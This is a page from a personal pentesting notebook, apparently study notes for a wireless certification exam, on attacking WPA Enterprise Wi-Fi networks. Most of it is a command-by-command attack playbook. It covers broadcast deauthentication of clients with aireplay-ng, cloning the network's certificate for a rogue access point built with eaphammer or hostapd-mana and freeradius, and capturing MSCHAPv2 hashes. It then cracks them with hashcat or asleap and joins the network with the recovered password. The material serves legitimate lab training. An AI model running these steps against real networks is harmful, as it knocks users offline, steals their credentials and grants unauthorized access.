Pentesting Notes
  • Home
  • 🌐Web pentesting
    • Content Discovery
    • Subdomain Enumeration
    • Authentication bypass
    • IDOR (Insecure Direct Object Reference)
    • Git repository
    • XSS
    • SSRF
    • CSRF
    • Injection
      • SQL Injection
      • Cypher injection
      • Command injection
      • Server Side Template Injection
      • NoSQL injection
      • XXE
    • FI (File Inclusion)
    • File upload
    • OAuth
    • JWT
    • CORS
    • Prototype pollution
    • Request Smuggling
  • Windows Pentesting
    • Enumerating users (No credentials)
    • Privilege Escalation
    • Post-Exploitation
    • Cross-domain enumeration
    • LDAP port (389, 636, 3268, 3269)
    • SMB port (139,445)
    • MSSQL port (1433)
    • Certificate Authority (CA)
    • Delegation attacks
    • Attacking Kerberos
    • Relay attacks
    • Bypassing Security
    • File Transfer
    • GPO (Group Policy Object)
    • Tools
      • Mimikatz
      • NetExec
      • Crackmapexec (CME)
      • Powerview
      • Bloodhound
      • Impacket
      • BloodyAD
      • Sliver C2
  • 🐧Linux Pentesting
    • Linux Privilege Esclation
    • Escape docker
    • Ansible
  • 🕊️Cross platform pivoting
    • Pivoting
  • ☁️Cloud
    • Kubernetes
    • Azure
      • Architecture
        • RBAC & ABAC roles
        • Entra ID roles
        • Entra ID - Authentication with OAuth and API's
        • Consent and Permissions
      • Service Discovery, Recon, Enumeration and Initial Access Attacks
        • Unauthenticated Recon
        • Password Spraying
        • Azure App Service
        • Azure Blob Storage
        • Phishing with Evilginx
        • Conditional Access
      • Authenticated Enumeration
        • ROADTools
        • BloodHound & AzureHound
        • Storage Accounts (database)
        • MFASweep
        • GraphRunner
        • Azure SQL databases
      • Privilege Escalation
        • Illicit Consent Grant
        • Macro enabled Word-files (Revshell)
        • Add secrets to app
        • Automation Accounts & Function Apps
        • Virtual Machines
        • Key Vault
        • ARM Deployment History
        • Enterprise Application / Service Principal
      • Lateral Movement
        • Entra ID Devices & Primary Refresh Tokens
        • Dynamic Groups
        • Application Proxy
        • Hybrid Identity
  • 🔁Reversing
    • Windows executables and DLL's
    • Linux binaries
    • Java applications
    • Android APK
  • 🛜Wireless networks
    • WPA/WPA2
    • WPS
    • WEP
    • Capative portal bypass
    • Setting up a Rogue Access Point
    • WPA Enterpise (WPA-MGT)
  • ⭐Tips and tricks
    • Tips and tricks
Powered by GitBook
On this page
  • 1. Finding WPA-MGT networks
  • 2. Finding the certificate information
  • 3. Setting up Rogue AP
  • 3.1 Using freeradius with hostapd-mana
  • 4. Broadcast deauth to all AP's
  • 5. Crack the hash
  • 5.1 Use asleap
  • 6. Connect to network
  • 7. Sources
  1. Wireless networks

WPA Enterpise (WPA-MGT)

PreviousSetting up a Rogue Access PointNextTips and tricks

Last updated 6 months ago

1. Finding WPA-MGT networks

You can find these on the 2.4ghz and 5ghz signals:

# dump 2.4ghz
sudo airodump-ng wlan0mon

# dump 5ghz
sudo airodump-ng -b a wlan0mon

In the "auth" column of airodump-ng, check for "MGT".

2. Finding the certificate information

To attack WPA Enterprise we build build our own rogue AP, but to do so, we need to create a certificate. We need to make the certificate with the same information as our target. To capture the information, we need to capture a handshake like in WPA2 attacks.

Use airodump-ng to capture the handshake:

sudo airodump-ng wlan0mon --bssid F0:9F:C2:71:22:15 -c 44 -w wpamgt

Do a deauth attack:

sudo aireplay-ng -0 5 -c 64:32:A8:07:6C:40 -a F0:9F:C2:71:22:15 wlan0mon

If successful, you will see "WPA handshake: X"

Open the wpamgt.cap file with WireShark and set the filter to tls.handshake.certificate:

Now extract the certificate with:

Save it as "cert.der" and extract the info using:

openssl x509 -inform der -in cert.der -text

The info we need:

3. Setting up Rogue AP

To attack a mistrusted client on an MGT network we have to create a RogueAP with the same ESSID and configuration but with a self-signed certificate, preferably with the same data as the real one in case the client manually verifies the certificate. To do this you can use “eaphammer”.

eaphammer is not allowed on the OSWP exam, instead use freeradius with hostapd-mana.

python3 ./eaphammer --cert-wizard

When this is completed, setup hostapd-mana with:

python3 ./eaphammer -i wlan3 --auth wpa-eap --essid wifi-corp --creds --negotiate balanced

3.1 Using freeradius with hostapd-mana

First of all, install freeradius

sudo apt-get install freeradius

Go to /etc/freeradius/3/certs and open ca.cnf and server.cnf

Modify the underneath values to the obtained information from the certificate:

After that we do the following commands under /etc/freeradius/3.0/certs to generate Diffie Hellman key for hostapd-mana

rm dh
make

Next, create a file called mana.eap_user

*	PEAP,TTLS,TLS,FAST
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    "pass"   [2]

After that we create a fake access point by creating a file called network.conf under any other directory:

ssid=<ESSID>
interface=<managed_mode_interface>
driver=nl80211

channel=<channel>
hw_mode=a # use 'g' for 5ghz networks
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0

eap_user_file=/etc/hostapd-mana/mana.eap_user

ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key

private_key_passwd=whatever

dh_file=/etc/freeradius/3.0/certs/dh


auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP


wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1

Make sure to point the mana.easp_user file to the right directory. Use hostapd-mana to setup the fake AP:

sudo hostapd-mana network.conf

4. Broadcast deauth to all AP's

With “airodump-ng” we detect the MAC of the clients to perform a deauthentication attack. So we do this attack on both clients in parallel. As there are 2 APs we have to perform the attack against the 2 APs, since disconnecting from 1 may connect to the other instead of to our RogueAP..

Delete -c option if you want to do it in broadcast (Kick all clients) You need to use another interface in monitor mode, Also you need to set the interface to the same channel as the target network before performing the De-authenticate attack, As the following:

sudo iwconfig wlan0mon channel 44

Next we sent a broadcast deauth to both AP's while our rogue AP is listening:

aireplay-ng -0 0 -a F0:9F:C2:71:22:1A wlan0mon
aireplay-ng -0 0 -a F0:9F:C2:71:22:15 wlan0mon

If succesful we receive a NETNTLM hash:

5. Crack the hash

hashcat -a 0 -m 5500 juan.tr::::673256730e43f7a67c712534e0970f86160487ce60e560bc:009f9888b8c646ec /root/rockyou-top100000.txt --force

5.1 Use asleap

If you cannot use hashcat you can use asleap to get the password instead:

asleap -C do:3b:8d:7b:22:00:0:91 -R 68:09:13:ac:e8:df:36:5f:42:94:fb:97:91:05:2:21:72:ff:b3:ce:c0:ca:26:f7 -W /usr/share/john/password.lst

6. Connect to network

Create a hostapd mana config:

network={
  ssid="NetworkName"
  scan_ssid=1
  key_mgmt=WPA-EAP
  identity="Domain\username"
  password="password"
  eap=PEAP
  phase1="peaplabel=0"
  phase2="auth=MSCHAPV2"
}

Connect:

wpa_supplicant -c network.conf -i <interface>

Get IP:

sudo dhclient wlan3
ip addr show wlan3

7. Sources

🛜
https://zeyadazima.com/notes/oswplaybook/#attacking-wpa-enterprise
https://r4ulcl.com/posts/walkthrough-wifichallenge-lab-2.0/#18-what-is-juans-wifi-corp-password